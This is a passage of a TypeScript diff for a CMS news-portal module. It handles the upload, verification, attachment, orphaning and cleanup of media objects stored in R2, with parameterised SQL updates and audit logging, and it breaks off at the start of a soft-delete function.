+ * these are treated as routine lifecycle bookkeeping, not high-risk actions.
+ */
+
+export type NewsMediaObjectStatus =
+  | "pending_upload"
+  | "uploaded"
+  | "verified"
+  | "attached"
+  | "orphaned"
+  | "deleted"
+  | "failed";
+
+export type NewsMediaOwnerResourceType =
+  | "blog_post"
+  | "blog_page"
+  | "homepage_section"
+  | "gallery_item"
+  | "ad"
+  | "video_thumbnail"
+  | "seo_image";
+
+/**
+ * `true` for exactly the statuses safe to reference from public content
+ * (Issue #636, epic `news_portal`): `verified` (passed the full `finalize`
+ * MIME-sniff/checksum pipeline, not yet attached to anything) and
+ * `attached` (verified AND currently in use by a resource). Every other
+ * status is unsafe to expose publicly: `pending_upload`/`uploaded` never
+ * completed content verification (Issue #631's Critical finding — a bare
+ * `HEAD`/upload-in-progress row could be anything), `failed` explicitly
+ * rejected content verification, `orphaned` was verified but no longer
+ * referenced by anything (a dangling reference pointing at it is exactly
+ * the bug this predicate exists to catch), and `deleted` is soft-deleted.
+ * Consumers outside this module (`blog-content`'s #636 R2-only-mode
+ * validation) MUST use this predicate rather than re-deriving the "which
+ * statuses are safe" list themselves, so the status model can only ever
+ * change in one place.
+ */
+export function isNewsMediaObjectSafeForPublicReference(
+  status: NewsMediaObjectStatus
+): boolean {
+  return status === "verified" || status === "attached";
+}
+
+export type NewsMediaObjectView = {
+  id: string;
+  tenantId: string;
+  moduleKey: string;
+  ownerResourceType: NewsMediaOwnerResourceType | null;
+  ownerResourceId: string | null;
+  storageDriver: string;
+  bucketName: string;
+  objectKey: string;
+  originalFilename: string | null;
+  publicUrl: string;
+  mimeType: string;
+  sizeBytes: number | null;
+  checksumSha256: string | null;
+  width: number | null;
+  height: number | null;
+  altText: string | null;
+  caption: string | null;
+  status: NewsMediaObjectStatus;
+  createdByTenantUserId: string;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+  restoredAt: Date | null;
+  restoredBy: string | null;
+};
+
+type NewsMediaObjectRow = {
+  id: string;
+  tenant_id: string;
+  module_key: string;
+  owner_resource_type: NewsMediaOwnerResourceType | null;
+  owner_resource_id: string | null;
+  storage_driver: string;
+  bucket_name: string;
+  object_key: string;
+  original_filename: string | null;
+  public_url: string;
+  mime_type: string;
+  size_bytes: string | number | null;
+  checksum_sha256: string | null;
+  width: number | null;
+  height: number | null;
+  alt_text: string | null;
+  caption: string | null;
+  status: NewsMediaObjectStatus;
+  created_by_tenant_user_id: string;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+  restored_at: Date | null;
+  restored_by: string | null;
+};
+
+function toView(row: NewsMediaObjectRow): NewsMediaObjectView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    moduleKey: row.module_key,
+    ownerResourceType: row.owner_resource_type,
+    ownerResourceId: row.owner_resource_id,
+    storageDriver: row.storage_driver,
+    bucketName: row.bucket_name,
+    objectKey: row.object_key,
+    originalFilename: row.original_filename,
+    publicUrl: row.public_url,
+    mimeType: row.mime_type,
+    sizeBytes: row.size_bytes === null ? null : Number(row.size_bytes),
+    checksumSha256: row.checksum_sha256,
+    width: row.width,
+    height: row.height,
+    altText: row.alt_text,
+    caption: row.caption,
+    status: row.status,
+    createdByTenantUserId: row.created_by_tenant_user_id,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason,
+    restoredAt: row.restored_at,
+    restoredBy: row.restored_by
+  };
+}
+
+const AUDIT_MODULE_KEY = "news_portal";
+const AUDIT_RESOURCE_TYPE = "news_media_object";
+
+export type CreatePendingNewsMediaObjectInput = {
+  mimeType: string;
+  originalFilename?: string;
+  altText?: string;
+  caption?: string;
+};
+
+export class UnsupportedNewsMediaMimeTypeInputError extends Error {
+  constructor(mimeType: string, allowedMimeTypes: string[]) {
+    super(
+      `Mime type "${mimeType}" is not in the configured allow-list: ${allowedMimeTypes.join(", ")}.`
+    );
+    this.name = "UnsupportedNewsMediaMimeTypeInputError";
+  }
+}
+
+/**
+ * Creates a `status='pending_upload'` metadata row: generates the object
+ * key server-side (§6 convention) and the public URL from the trusted
+ * `config.publicBaseUrl` — NEVER from client input. `mimeType` is validated
+ * against `config.allowedMimeTypes` BEFORE the key is built (defense in
+ * depth — this is not the only place mime validation happens; #634's
+ * confirm step must still re-validate against actual bytes).
+ */
+export async function createPendingNewsMediaObject(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  config: NewsMediaR2Config,
+  input: CreatePendingNewsMediaObjectInput,
+  correlationId?: string
+): Promise<NewsMediaObjectView> {
+  const mimeType = input.mimeType.toLowerCase().trim();
+
+  if (!config.allowedMimeTypes.includes(mimeType)) {
+    throw new UnsupportedNewsMediaMimeTypeInputError(
+      mimeType,
+      config.allowedMimeTypes
+    );
+  }
+
+  const objectKey = buildNewsMediaObjectKey({ tenantId, mimeType });
+  const publicUrl = buildNewsMediaPublicUrl(config.publicBaseUrl, objectKey);
+
+  const rows = (await tx`
+    INSERT INTO awcms_news_media_objects
+      (tenant_id, bucket_name, object_key, original_filename, public_url,
+       mime_type, alt_text, caption, created_by_tenant_user_id)
+    VALUES (
+      ${tenantId}, ${config.bucket}, ${objectKey}, ${input.originalFilename ?? null},
+      ${publicUrl}, ${mimeType}, ${input.altText ?? null}, ${input.caption ?? null},
+      ${actorTenantUserId}
+    )
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  const created = toView(rows[0]!);
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.created",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: created.id,
+    severity: "info",
+    message: `News media object created (pending upload): ${objectKey}.`,
+    attributes: { objectKey, mimeType },
+    correlationId
+  });
+
+  return created;
+}
+
+export type FetchNewsMediaObjectOptions = {
+  includeDeleted?: boolean;
+};
+
+export async function fetchNewsMediaObjectById(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  options: FetchNewsMediaObjectOptions = {}
+): Promise<NewsMediaObjectView | null> {
+  const rows = (
+    options.includeDeleted
+      ? await tx`
+        SELECT id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+          storage_driver, bucket_name, object_key, original_filename, public_url,
+          mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+          status, created_by_tenant_user_id, created_at, updated_at,
+          deleted_at, deleted_by, delete_reason, restored_at, restored_by
+        FROM awcms_news_media_objects
+        WHERE tenant_id = ${tenantId} AND id = ${id}
+      `
+      : await tx`
+        SELECT id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+          storage_driver, bucket_name, object_key, original_filename, public_url,
+          mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+          status, created_by_tenant_user_id, created_at, updated_at,
+          deleted_at, deleted_by, delete_reason, restored_at, restored_by
+        FROM awcms_news_media_objects
+        WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+      `
+  ) as NewsMediaObjectRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+/**
+ * Bulk sibling of `fetchNewsMediaObjectById` (Issue #835 §1): resolves many
+ * ids in ONE `id = ANY(...)` round-trip instead of one query per id. Used by
+ * `news-media-port-adapter.ts`'s `resolveMediaReferences`, whose signature
+ * is already batch-shaped — callers correctly hand it the whole id set, only
+ * for the old implementation to loop `fetchNewsMediaObjectById` N times. The
+ * default (`includeDeleted` omitted) filters `deleted_at IS NULL`, matching
+ * the point lookup. Order is not guaranteed — callers key by id, never by
+ * position.
+ */
+export async function fetchNewsMediaObjectsByIds(
+  tx: Bun.SQL,
+  tenantId: string,
+  ids: readonly string[],
+  options: FetchNewsMediaObjectOptions = {}
+): Promise<NewsMediaObjectView[]> {
+  const uniqueIds = [...new Set(ids)];
+
+  if (uniqueIds.length === 0) {
+    return [];
+  }
+
+  const rows = (
+    options.includeDeleted
+      ? await tx`
+        SELECT id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+          storage_driver, bucket_name, object_key, original_filename, public_url,
+          mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+          status, created_by_tenant_user_id, created_at, updated_at,
+          deleted_at, deleted_by, delete_reason, restored_at, restored_by
+        FROM awcms_news_media_objects
+        WHERE tenant_id = ${tenantId} AND id = ANY(${tx.array(uniqueIds, "uuid")})
+      `
+      : await tx`
+        SELECT id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+          storage_driver, bucket_name, object_key, original_filename, public_url,
+          mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+          status, created_by_tenant_user_id, created_at, updated_at,
+          deleted_at, deleted_by, delete_reason, restored_at, restored_by
+        FROM awcms_news_media_objects
+        WHERE tenant_id = ${tenantId} AND id = ANY(${tx.array(uniqueIds, "uuid")})
+          AND deleted_at IS NULL
+      `
+  ) as NewsMediaObjectRow[];
+
+  return rows.map(toView);
+}
+
+export type MarkNewsMediaObjectUploadedInput = {
+  sizeBytes?: number;
+  checksumSha256?: string;
+};
+
+/**
+ * `pending_upload -> uploaded`. The `WHERE status = 'pending_upload'` guard
+ * is this table's mutual-exclusion primitive: Postgres serializes concurrent
+ * `UPDATE`s against the same row, so exactly one concurrent caller ever
+ * transitions a given row out of `pending_upload` — every other caller's
+ * `UPDATE` matches zero rows and gets `null` back. Issue #634's finalize
+ * orchestration (security-auditor High finding, PR #653 review) calls this
+ * with NO `input` at all as the atomic "claim" step BEFORE attempting any
+ * R2 network call — this is what prevents N concurrent `finalize` requests
+ * (different `Idempotency-Key`s, so the idempotency store alone cannot
+ * dedupe them) from each triggering their own expensive R2 `HEAD`+`GET`
+ * for the same object. `sizeBytes`/`checksumSha256` are optional precisely
+ * because at claim time (before the real `GET` has happened) neither is
+ * known yet — `COALESCE` leaves the column untouched (`NULL`, for a fresh
+ * claim) when omitted, so a caller that already knows both values (a
+ * standalone/legacy call site, or a test) can still set them here in one
+ * step, same as before this change. Deliberately NOT an audited action on
+ * its own: "uploaded" only means bytes exist at the object key, not that
+ * they were verified as safe/matching content (`markNewsMediaObjectVerified`
+ * is the audited "verify" action the epic's acceptance criteria actually
+ * requires).
+ */
+export async function markNewsMediaObjectUploaded(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  input: MarkNewsMediaObjectUploadedInput = {}
+): Promise<NewsMediaObjectView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET status = 'uploaded',
+        size_bytes = COALESCE(${input.sizeBytes ?? null}, size_bytes),
+        checksum_sha256 = COALESCE(${input.checksumSha256 ?? null}, checksum_sha256),
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status = 'pending_upload' AND deleted_at IS NULL
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export type MarkNewsMediaObjectVerifiedInput = {
+  width?: number;
+  height?: number;
+  /**
+   * The REAL size/checksum, computed from the bytes actually read by the
+   * capped streaming `GET` (`news-media-r2-client.ts`'s `getObject`) —
+   * never from a `HEAD` response, which can be stale/raced (security-auditor
+   * Critical finding, PR #653 review). Optional + `COALESCE`d so a caller
+   * that already set them via `markNewsMediaObjectUploaded` (the legacy/
+   * standalone one-step flow) does not need to repeat them here.
+   */
+  sizeBytes?: number;
+  checksumSha256?: string;
+};
+
+/**
+ * `uploaded -> verified` — server-side MIME sniffing/checksum verification
+ * (doc §9, #634's confirm step) passed. This is the "verify" audit action
+ * the epic's acceptance criteria requires.
+ */
+export async function markNewsMediaObjectVerified(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  input: MarkNewsMediaObjectVerifiedInput = {},
+  correlationId?: string
+): Promise<NewsMediaObjectView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET status = 'verified', width = ${input.width ?? null}, height = ${input.height ?? null},
+        size_bytes = COALESCE(${input.sizeBytes ?? null}, size_bytes),
+        checksum_sha256 = COALESCE(${input.checksumSha256 ?? null}, checksum_sha256),
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status = 'uploaded' AND deleted_at IS NULL
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  const updated = rows[0] ? toView(rows[0]) : null;
+  if (!updated) return null;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.verified",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "info",
+    message: `News media object verified: ${updated.objectKey}.`,
+    attributes: { objectKey: updated.objectKey },
+    correlationId
+  });
+
+  return updated;
+}
+
+export type AttachNewsMediaObjectInput = {
+  ownerResourceType: NewsMediaOwnerResourceType;
+  ownerResourceId: string;
+};
+
+/**
+ * `verified -> attached` — binds the media object to an owning resource.
+ * Deliberately requires `status = 'verified'` (never straight from
+ * `pending_upload`/`uploaded`) — this is what enforces "Keputusan kunci #4"
+ * (editorial content must only ever point at verified/confirmed media,
+ * never at an unverified upload) at the write path, not just by convention.
+ */
+export async function attachNewsMediaObject(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  input: AttachNewsMediaObjectInput,
+  correlationId?: string
+): Promise<NewsMediaObjectView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET status = 'attached', owner_resource_type = ${input.ownerResourceType},
+        owner_resource_id = ${input.ownerResourceId}, updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status = 'verified' AND deleted_at IS NULL
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  const updated = rows[0] ? toView(rows[0]) : null;
+  if (!updated) return null;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.attached",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "info",
+    message: `News media object attached to ${input.ownerResourceType} ${input.ownerResourceId}.`,
+    attributes: {
+      objectKey: updated.objectKey,
+      ownerResourceType: input.ownerResourceType,
+      ownerResourceId: input.ownerResourceId
+    },
+    correlationId
+  });
+
+  return updated;
+}
+
+/**
+ * `attached -> verified` — reverses `attachNewsMediaObject`. Returns to
+ * `verified` (not `orphaned`): a detached-but-still-good media object
+ * remains immediately reusable for another `attach` call.
+ * `markNewsMediaObjectOrphaned` is the separate, deliberate "flag for
+ * cleanup" transition (doc `r2-backup-lifecycle.md` §2's orphan detection),
+ * not an automatic side effect of detach.
+ */
+export async function detachNewsMediaObject(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  correlationId?: string
+): Promise<NewsMediaObjectView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET status = 'verified', owner_resource_type = NULL, owner_resource_id = NULL,
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status = 'attached' AND deleted_at IS NULL
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  const updated = rows[0] ? toView(rows[0]) : null;
+  if (!updated) return null;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.detached",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "info",
+    message: `News media object detached: ${updated.objectKey}.`,
+    attributes: { objectKey: updated.objectKey },
+    correlationId
+  });
+
+  return updated;
+}
+
+/**
+ * `pending_upload|uploaded|verified -> orphaned` — flags a never-attached
+ * object as a cleanup candidate (doc `r2-backup-lifecycle.md` §2, e.g. a
+ * pending TTL job). Deliberately excluded from the required audit-event
+ * list (create/verify/attach/detach/delete/restore/purge) — this is routine
+ * lifecycle bookkeeping performed by an automated job, not itself a
+ * high-risk action; callers may still `log()` it structurally.
+ *
+ * Sets `orphaned_at = now()` (migration 046, Issue #690) — the moment the
+ * `NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS` grace period
+ * (`scripts/news-media-r2-reconcile.ts`) starts counting from. Nothing else
+ * in this file writes `orphaned_at` — it is set exactly once, here, and only
+ * read afterward (by the reconciliation job's stale-orphan sweep), so the
+ * grace period can never be silently reset/extended by an unrelated update.
+ */
+export async function markNewsMediaObjectOrphaned(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<NewsMediaObjectView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET status = 'orphaned', orphaned_at = now(), updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status IN ('pending_upload', 'uploaded', 'verified') AND deleted_at IS NULL
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export type MarkNewsMediaObjectFailedOptions = {
+  /**
+   * Issue #690: when set, this transition ONLY claims rows also older than
+   * this cutoff (`created_at < olderThan`) — used by
+   * `scripts/news-media-r2-reconcile.ts` as the ATOMIC claim step for
+   * expired `pending_upload`/`uploaded` rows, the exact same "guarded
+   * UPDATE...WHERE, Postgres serializes concurrent writers" mutual-exclusion
+   * idiom `finalizeNewsMediaUploadSession`'s own claim
+   * (`markNewsMediaObjectUploaded`) already established: if a client's
+   * `finalize()` call concurrently transitions the SAME row away from
+   * `pending_upload`/`uploaded` first, this `UPDATE`'s `WHERE` no longer
+   * matches, so it claims zero rows here — the row is never yanked out from
+   * under a genuinely in-flight upload. Omitted (the pre-#690 default) for
+   * every other caller (verification rejection, R2 provider error at
+   * finalize time) — no age filter, exactly the original behavior.
+   */
+  olderThan?: Date;
+};
+
+/**
+ * `pending_upload|uploaded -> failed` — upload or verification failed
+ * (checksum mismatch, R2 error, disallowed content sniffed, etc), OR (Issue
+ * #690, `options.olderThan` set) the row expired past
+ * `NEWS_MEDIA_R2_PENDING_TTL_MINUTES` without ever being finalized. Same
+ * "not in the required audit list" reasoning as `markNewsMediaObjectOrphaned`.
+ */
+export async function markNewsMediaObjectFailed(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  options: MarkNewsMediaObjectFailedOptions = {}
+): Promise<NewsMediaObjectView | null> {
+  const rows = (
+    options.olderThan
+      ? await tx`
+        UPDATE awcms_news_media_objects
+        SET status = 'failed', updated_at = now()
+        WHERE tenant_id = ${tenantId} AND id = ${id}
+          AND status IN ('pending_upload', 'uploaded') AND deleted_at IS NULL
+          AND created_at < ${options.olderThan}
+        RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+          storage_driver, bucket_name, object_key, original_filename, public_url,
+          mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+          status, created_by_tenant_user_id, created_at, updated_at,
+          deleted_at, deleted_by, delete_reason, restored_at, restored_by
+      `
+      : await tx`
+        UPDATE awcms_news_media_objects
+        SET status = 'failed', updated_at = now()
+        WHERE tenant_id = ${tenantId} AND id = ${id}
+          AND status IN ('pending_upload', 'uploaded') AND deleted_at IS NULL
+        RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+          storage_driver, bucket_name, object_key, original_filename, public_url,
+          mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+          status, created_by_tenant_user_id, created_at, updated_at,
+          deleted_at, deleted_by, delete_reason, restored_at, restored_by
+      `
+  ) as NewsMediaObjectRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+/**
+ * Hard delete for a `status = 'failed'` row past
+ * `NEWS_MEDIA_R2_PENDING_TTL_MINUTES` (Issue #690,
+ * `scripts/news-media-r2-reconcile.ts`) — the row never became a real,
+ * referenceable resource (`r2-backup-lifecycle.md` §2: a stale `pending`
+ * row is "bukan resource yang pernah dipakai siapa pun"), so this is a hard
+ * DELETE, not the soft-delete path `softDeleteNewsMediaObject`/
+ * `purgeNewsMediaObject` use for a resource that WAS real. The `WHERE`
+ * guard (`status = 'failed' AND created_at < olderThan`) re-verifies
+ * eligibility atomically at delete time — this is called only AFTER the
+ * caller has already deleted (or confirmed the absence of) the R2 object
+ * for `object_key`, per this module's own ordering discipline (see
+ * `scripts/news-media-r2-reconcile.ts`'s header for the full DB-claim-first,
+ * R2-delete-second rationale and its self-healing relationship with
+ * "orphan-in-R2" detection).
+ */
+export async function purgeExpiredPendingNewsMediaObject(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  olderThan: Date
+): Promise<boolean> {
+  const rows = (await tx`
+    DELETE FROM awcms_news_media_objects
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status = 'failed' AND deleted_at IS NULL AND created_at < ${olderThan}
+    RETURNING object_key
+  `) as { object_key: string }[];
+
+  if (rows.length === 0) return false;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.pending_expired_purged",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "warning",
+    message: `News media object purged: expired pending upload past its TTL (${rows[0]!.object_key}).`,
+    attributes: { objectKey: rows[0]!.object_key }
+  });
+
+  return true;
+}
+
+/**
+ * `orphaned -> ` soft-deleted (Issue #690,
+ * `scripts/news-media-r2-reconcile.ts`) — physical R2 cleanup grace period
+ * (`NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS`, `r2-backup-lifecycle.md` §3) has
+ * elapsed for a row already flagged `orphaned`. Unlike
+ * `purgeExpiredPendingNewsMediaObject`, this is a SOFT delete — the row WAS
+ * a real, once-verified media object (§3's retention table: "Baris metadata
+ * `deleted` (soft delete): baris tetap ada (audit trail)... objek fisik R2
+ * dihapus setelah masa tenggang"). `status`/`orphaned_at` are left
+ * unchanged (soft delete stays orthogonal to `status`, same convention as
+ * every other transition in this file). No `actorTenantUserId` — this is a
+ * system job, not a human action; `deleted_by` stays `NULL`.
+ */
+export async function markStaleOrphanedNewsMediaObjectDeleted(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  olderThan: Date
+): Promise<boolean> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET deleted_at = now(), delete_reason = 'r2_orphan_grace_period_expired',
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status = 'orphaned' AND deleted_at IS NULL AND orphaned_at < ${olderThan}
+    RETURNING object_key
+  `) as { object_key: string }[];
+
+  if (rows.length === 0) return false;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.orphan_expired_deleted",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "warning",
+    message: `News media object soft deleted: orphan grace period expired (${rows[0]!.object_key}).`,
+    attributes: { objectKey: rows[0]!.object_key }
+  });
+
+  return true;
+}
+
+/**
+ * Point lookup used as the FINAL, immediate-before-delete gate for
+ * "orphan-in-R2" candidates (Issue #690,
+ * `scripts/news-media-r2-reconcile.ts`) — an R2 object whose key had NO
+ * matching row in the job's own earlier bulk DB scan. Between that scan and
+ * the moment the job is actually about to call `deleteObject`, a NEW row
+ * for the SAME key could have been created (this is impossible in the
+ * current upload flow, since `createPendingNewsMediaObject` always inserts
+ * the row BEFORE a client ever receives a presigned URL for that key — but
+ * this re-check exists precisely so the job's safety property does not rest
+ * on that invariant holding forever). Deliberately ignores `deleted_at`
+ * (ANY row for this key — soft-deleted or not — means "already tracked,
+ * do not treat as an untracked orphan-in-R2 object"), using the exact same
+ * `(tenant_id, object_key)` unique index `createPendingNewsMediaObject`'s
+ * own INSERT relies on.
+ */
+export async function objectKeyExistsForTenant(
+  tx: Bun.SQL,
+  tenantId: string,
+  objectKey: string
+): Promise<boolean> {
+  const rows = (await tx`
+    SELECT 1 AS exists_flag FROM awcms_news_media_objects
+    WHERE tenant_id = ${tenantId} AND object_key = ${objectKey}
+    LIMIT 1
+  `) as { exists_flag: number }[];
+
+  return rows.length > 0;
+}
+
+export type NewsMediaReconciliationSnapshotRow = {
+  id: string;
+  objectKey: string;
+  status: NewsMediaObjectStatus;
+  createdAt: Date;
+  orphanedAt: Date | null;
+  deletedAt: Date | null;
+};
+
+/**
+ * Default safety bound for `fetchNewsMediaObjectsForReconciliation` —
+ * mirrors `src/lib/jobs/batching.ts`'s `DEFAULT_MAX_PASSES` reasoning (a
+ * single scheduled run must never load an unbounded number of rows into
+ * memory). A tenant with more than this many non-purged media rows only
+ * gets a PARTIAL snapshot this run (oldest rows first, so the longest-
+ * overdue cleanup candidates are prioritized) — `scripts/news-media-r2-
+ * reconcile.ts` surfaces this as `status: "partial"` job telemetry, same
+ * convention `audit-log-purge.ts`'s `hitPassLimit` uses, and the remainder
+ * is picked up on a LATER run (this snapshot is re-derived fresh every run,
+ * never a persisted cursor).
+ */
+export const NEWS_MEDIA_RECONCILIATION_SNAPSHOT_LIMIT = 20_000;
+
+/**
+ * The single DB-side input to `categorizeNewsMediaReconciliation`
+ * (`news-media-reconciliation-categorization.ts`, Issue #690) — every
+ * non-purged row for one tenant (any `status`, including already
+ * soft-deleted), so that module's `orphanInR2` category can correctly tell
+ * "genuinely no row references this R2 key" apart from "there IS a row, it
+ * just isn't one of the expected-present statuses". Ordered oldest-first
+ * (`created_at ASC`) so a snapshot truncated by
+ * `NEWS_MEDIA_RECONCILIATION_SNAPSHOT_LIMIT` always contains the
+ * longest-overdue cleanup candidates rather than an arbitrary subset.
+ */
+export async function fetchNewsMediaObjectsForReconciliation(
+  tx: Bun.SQL,
+  tenantId: string,
+  limit: number = NEWS_MEDIA_RECONCILIATION_SNAPSHOT_LIMIT
+): Promise<NewsMediaReconciliationSnapshotRow[]> {
+  const rows = (await tx`
+    SELECT id, object_key, status, created_at, orphaned_at, deleted_at
+    FROM awcms_news_media_objects
+    WHERE tenant_id = ${tenantId}
+    ORDER BY created_at ASC
+    LIMIT ${limit}
+  `) as {
+    id: string;
+    object_key: string;
+    status: NewsMediaObjectStatus;
+    created_at: Date;
+    orphaned_at: Date | null;
+    deleted_at: Date | null;
+  }[];
+
+  return rows.map((row) => ({
+    id: row.id,
+    objectKey: row.object_key,
+    status: row.status,
+    createdAt: row.created_at,
+    orphanedAt: row.orphaned_at,
+    deletedAt: row.deleted_at
+  }));
+}
+
+/**
+ * `uploaded -> pending_upload` — reverts the atomic claim
+ * `markNewsMediaObjectUploaded` makes, ONLY for a transient/infra reason
+ * (R2 provider error, circuit breaker open, timeout) rather than a
+ * definitive content-rejection (that path is `markNewsMediaObjectFailed`,
+ * permanent — the client must start a new upload session). Issue #634's
+ * finalize orchestration (security-auditor High finding, PR #653 review)
+ * claims a row BEFORE calling R2 so concurrent `finalize` calls cannot each
+ * trigger their own R2 round trip; without this revert, a single transient
+ * R2 failure would leave the row stuck in `uploaded` forever with no path
+ * back to a retryable state.
+ */
+export async function revertNewsMediaObjectUploadClaim(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<NewsMediaObjectView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET status = 'pending_upload', updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+      AND status = 'uploaded' AND deleted_at IS NULL
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+/**
+ * Soft delete — orthogonal to `status` (same convention as
+ * `awcms_blog_posts`): deleting never rewrites `status`, it only sets
+ * `deleted_at`/`deleted_by`/`delete_reason`. Works from any status.
+ */
+export async function softDeleteNewsMediaObject(
